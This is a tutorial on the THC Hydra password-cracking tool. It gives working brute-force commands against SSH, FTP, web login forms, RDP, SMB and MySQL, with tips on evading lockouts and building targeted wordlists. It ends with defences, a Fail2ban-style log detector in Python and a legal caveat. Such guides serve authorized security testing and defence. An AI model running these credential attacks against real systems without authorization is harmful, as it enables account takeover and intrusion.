THC Hydra is one of the oldest and most battle-tested online password cracking tools in existence. It supports over 50 protocols and can launch credential attacks against virtually any network authentication service — SSH, FTP, HTTP forms, RDP, SMB, MySQL, VNC, and dozens more. For penetration testers, Hydra is invaluable during the credential-testing phase of an engagement, especially when combined with good wordlists and username enumeration data gathered earlier.
This guide covers installation, core syntax, the most useful protocols, optimizing attacks, and responsible use practices.
Installing Hydra
Hydra ships with Kali Linux and Parrot OS. To install on Debian/Ubuntu:
sudo apt install hydra
To build from source:
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra
./configure
make
sudo make install
Verify:
hydra --version
Core Syntax
hydra [options] target protocol
The most important flags:
| Flag | Description |
|---|---|
| -l | Single username |
| -L | Username wordlist file |
| -p | Single password |
| -P | Password wordlist file |
| -t | Number of parallel tasks per target (default: 16) |
| -s | Custom port number |
| -o | Output file for valid credentials |
| -v | Verbose mode |
| -V | Very verbose (show each attempt) |
| -f | Stop after first valid credential found |
| -u | Try all usernames before cycling passwords |
Brute-Forcing SSH
SSH is one of the most commonly tested services:
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100
With a username list:
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100 -t 4 -o ssh_results.txt
Note: SSH servers often have MaxAuthTries set to 3-6, meaning Hydra needs to space attempts or use fewer threads to avoid being locked out.
Brute-Forcing FTP
hydra -l ftp_user -P passwords.txt ftp://192.168.1.100
For anonymous login testing:
hydra -l anonymous -p anonymous ftp://192.168.1.100
Brute-Forcing Web Login Forms
Web login forms are the most common target. Hydra supports both GET and POST form attacks. You need three pieces of information:
- The form action URL
- The POST parameters (use browser DevTools or Burp Suite to capture them)
- A string that appears in a failed login response
HTTP POST Form
hydra -l admin -P rockyou.txt target.com http-post-form \
"/login:username=^USER^&password=^PASS^:Invalid credentials"
The format for the module is:
"/path:POST_body:failure_string"
- ^USER^ is replaced with the username
- ^PASS^ is replaced with the password
- The third field is a string that Hydra looks for in the response to identify a failed attempt
HTTP GET Form
hydra -l admin -P passwords.txt target.com http-get-form \
"/login?user=^USER^&pass=^PASS^:Login failed"
With HTTPS
hydra -l admin -P rockyou.txt https-post-form://target.com \
"/login:username=^USER^&password=^PASS^:Incorrect password"
Adding Cookies and Headers
Some applications require a CSRF token or session cookie:
hydra -l admin -P passwords.txt target.com https-post-form \
"/login:username=^USER^&password=^PASS^&_token=abc123:Invalid:H=Cookie: session=xyz"
Use H= to pass custom headers within the module string.
Brute-Forcing RDP
hydra -l administrator -P rockyou.txt rdp://192.168.1.100 -t 4
RDP should use low thread counts (2-4) because the protocol is slow and high concurrency can trigger lockouts.
Brute-Forcing SMB
hydra -l administrator -P rockyou.txt smb://192.168.1.100
Brute-Forcing MySQL
hydra -l root -P passwords.txt mysql://192.168.1.100
Multiple Targets
Hydra can attack a list of targets simultaneously:
hydra -l admin -P rockyou.txt -M targets.txt ssh
Where targets.txt contains one IP or hostname per line.
Optimizing Hydra Attacks
Thread Count
The default of 16 threads is fine for most HTTP services. Reduce to 4 for SSH and RDP to avoid lockouts:
hydra -t 4 -l admin -P rockyou.txt ssh://target
Stop at First Valid Credential
hydra -f -l admin -P rockyou.txt ftp://target
Resume an Interrupted Attack
If Hydra is interrupted, it saves a restore file. Resume with:
hydra -R
Choosing the Right Wordlist
| Scenario | Recommended Wordlist |
|---|---|
| General purpose | /usr/share/wordlists/rockyou.txt |
| Default credentials | /usr/share/seclists/Passwords/Default-Credentials/ |
| Web applications | /usr/share/seclists/Passwords/Web-Content/ |
| Fast targeting | /usr/share/seclists/Passwords/Common-Credentials/top-1000.txt |
Generate a targeted wordlist with CeWL by spidering the target’s website:
cewl http://target.com -d 2 -m 5 -w custom_wordlist.txt
Common Protocols Reference
| Protocol | Hydra Module | Example |
|---|---|---|
| SSH | ssh | hydra -l user -P pass.txt ssh://host |
| FTP | ftp | hydra -l user -P pass.txt ftp://host |
| HTTP POST | http-post-form | See above |
| HTTPS POST | https-post-form | See above |
| RDP | rdp | hydra -l user -P pass.txt rdp://host |
| SMB | smb | hydra -l user -P pass.txt smb://host |
| MySQL | mysql | hydra -l root -P pass.txt mysql://host |
| PostgreSQL | postgres | hydra -l postgres -P pass.txt postgres://host |
| VNC | vnc | hydra -P pass.txt vnc://host |
| Telnet | telnet | hydra -l user -P pass.txt telnet://host |
| SMTP | smtp | hydra -l user -P pass.txt smtp://host |
Defenses Against Hydra Attacks
Understanding Hydra also means understanding how to defend against it:
- Account lockout policies — lock accounts after 5-10 failed attempts
- Rate limiting and CAPTCHA on web login forms
- Fail2ban to ban IPs after repeated SSH failures
- Multi-factor authentication renders credential brute-forcing useless even with valid passwords
- Strong password policies — enforce minimum length and complexity
- SSH key authentication instead of passwords
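As an added defensive example (not part of the original guide or of Hydra itself), the following Python script applies the Fail2ban-style check from the list above to a few constructed OpenSSH log lines, flagging any source IP that reaches 5 failed passwords within a sliding 600-second window and listing the usernames it tried, which separates a single-user run (-l) from a username-list run (-L). The log year is an assumption, since classic syslog timestamps carry none, and all IPs, usernames and thresholds are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Standard OpenSSH failure line; classic syslog timestamps have no year, so one is assumed.
FAIL_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)
ASSUMED_YEAR = 2024


def parse_failures(lines):
    """Yield (timestamp, username, source_ip) for each failed-password line; others are skipped."""
    for line in lines:
        m = FAIL_RE.match(line)
        if m:
            ts = datetime.strptime(f"{ASSUMED_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["user"], m["ip"]


def detect_bruteforce(lines, maxretry=5, findtime=600):
    """Flag each source IP reaching maxretry failures inside a sliding findtime-second
    window (Fail2ban-style thresholds). Returns {ip: {"failures": n, "users": [...]}};
    many distinct users from one IP indicates a username-list (-L) run rather than -l."""
    recent, total, users, flagged = defaultdict(deque), defaultdict(int), defaultdict(set), set()
    for ts, user, ip in parse_failures(lines):
        total[ip] += 1
        users[ip].add(user)
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > findtime:  # drop failures outside the window
            q.popleft()
        if len(q) >= maxretry:
            flagged.add(ip)
    return {ip: {"failures": total[ip], "users": sorted(users[ip])} for ip in sorted(flagged)}


# Constructed sample lines (not real log data).
SAMPLE_LOG = (
    # Hydra-like burst: six failures for one user within three seconds (parallel tasks)
    [f"Mar  3 10:15:0{i // 2} host sshd[22{i}]: Failed password for admin "
     f"from 203.0.113.7 port 5012{i} ssh2" for i in range(6)]
    # one mistyped password followed by success: not an attack
    + ["Mar  3 10:16:40 host sshd[2300]: Failed password for alice from 198.51.100.2 port 41000 ssh2",
       "Mar  3 10:16:45 host sshd[2301]: Accepted password for alice from 198.51.100.2 port 41000 ssh2"]
    # username-list run: five different users, one attempt every thirty seconds
    + [f"Mar  3 10:2{i // 2}:{'30' if i % 2 else '00'} host sshd[24{i}]: Failed password for "
       f"invalid user {u} from 192.0.2.9 port 6000{i} ssh2"
       for i, u in enumerate(["oracle", "root", "test", "guest", "admin"])]
)
```

Calling detect_bruteforce(SAMPLE_LOG) flags both attacking IPs while leaving the single typo alone; shrinking findtime to 60 seconds keeps the burst but misses the slow username-list run, which is why Fail2ban's findtime should be set with low-and-slow attempts (Hydra with -t 1 or -t 2) in mind.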
Legal and Ethical Use
Hydra must only be used against systems you own or have explicit written permission to test. Unauthorized brute-force attacks are criminal offenses under laws like the Computer Fraud and Abuse Act (CFAA) in the US and equivalent legislation globally. Always operate within a defined penetration testing scope and never target production systems without proper authorization.
Summary
THC Hydra remains one of the most effective tools for testing online authentication services. Its protocol breadth, parallel threading, and flexible output options make it a staple in any penetration tester’s toolkit. Pair it with curated wordlists, careful thread management, and proper scope agreements for best results.